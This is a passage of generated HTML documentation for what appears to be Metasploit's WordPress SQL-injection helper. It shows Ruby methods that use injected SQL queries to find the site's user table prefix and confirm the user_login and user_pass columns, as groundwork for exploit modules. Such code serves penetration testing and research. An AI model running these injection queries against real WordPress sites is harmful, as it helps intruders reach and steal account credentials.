<span class='id identifier rubyid_default_prefix_check'>default_prefix_check</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>SELECT </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_indicator'>indicator</span><span class='embexpr_end'>}</span><span class='tstring_content'> FROM information_schema.tables WHERE table_name = &#39;wp_users&#39;</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_result'>result</span> <span class='op'>=</span> <span class='ivar'>@sqli</span><span class='period'>.</span><span class='id identifier rubyid_run_sql'>run_sql</span><span class='lparen'>(</span><span class='id identifier rubyid_default_prefix_check'>default_prefix_check</span><span class='rparen'>)</span><span class='op'>&amp;.</span><span class='id identifier rubyid_to_i'>to_i</span>
<span class='kw'>if</span> <span class='id identifier rubyid_result'>result</span> <span class='op'>==</span> <span class='id identifier rubyid_indicator'>indicator</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>{WPSQLi} Retrieved default table prefix: &#39;wp_&#39;</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>wp_</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>{WPSQLi} Default prefix not found, attempting to detect custom table prefix...</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_query'>query</span> <span class='op'>=</span> <span class='heredoc_beg'>&lt;&lt;-SQL</span>
<span class='tstring_content'> SELECT LEFT(table_name, LENGTH(table_name) - LENGTH(&#39;users&#39;))
FROM information_schema.tables
WHERE table_schema = database()
AND table_name LIKE &#39;%\\_users&#39;
AND (SELECT COUNT(*)
FROM information_schema.columns </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_random_alias'>random_alias</span><span class='embexpr_end'>}</span><span class='tstring_content'>
WHERE </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_random_alias'>random_alias</span><span class='embexpr_end'>}</span><span class='tstring_content'>.table_schema = tables.table_schema
AND </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_random_alias'>random_alias</span><span class='embexpr_end'>}</span><span class='tstring_content'>.table_name = tables.table_name
AND </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_random_alias'>random_alias</span><span class='embexpr_end'>}</span><span class='tstring_content'>.column_name IN (&#39;user_login&#39;, &#39;user_pass&#39;)
) = 2
LIMIT 1
</span><span class='heredoc_end'> SQL
</span>
<span class='id identifier rubyid_prefix'>prefix</span> <span class='op'>=</span> <span class='ivar'>@sqli</span><span class='period'>.</span><span class='id identifier rubyid_run_sql'>run_sql</span><span class='lparen'>(</span><span class='id identifier rubyid_query'>query</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>\s+</span><span class='regexp_end'>/</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'> </span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_prefix'>prefix</span> <span class='op'>&amp;&amp;</span> <span class='op'>!</span><span class='id identifier rubyid_prefix'>prefix</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>{WPSQLi} Unable to detect the table prefix.</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>{WPSQLi} Custom table prefix detected: &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_prefix'>prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_prefix'>prefix</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="wordpress_sqli_initialize-instance_method">
#<strong>wordpress_sqli_initialize</strong>(sqli) &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Function to initialize the SQLi instance in the mixin.</p>
<p>This function sets up the SQLi instance that is initialized in the exploit module. The SQLi instance is passed as a parameter to ensure it is accessible within the mixin and can be used for executing SQL injection queries.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>sqli</span>
<span class='type'>(<tt>Object</tt>)</span>
&mdash;
<div class='inline'>
<p>The SQLi instance initialized in the exploit module.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
21
22
23
24</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/wordpress/sqli.rb', line 21</span>
<span class='kw'>def</span> <span class='id identifier rubyid_wordpress_sqli_initialize'>wordpress_sqli_initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_sqli'>sqli</span><span class='rparen'>)</span>
<span class='ivar'>@sqli</span> <span class='op'>=</span> <span class='id identifier rubyid_sqli'>sqli</span>
<span class='ivar'>@prefix</span> <span class='op'>=</span> <span class='id identifier rubyid_wordpress_sqli_identify_table_prefix'>wordpress_sqli_identify_table_prefix</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:28 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink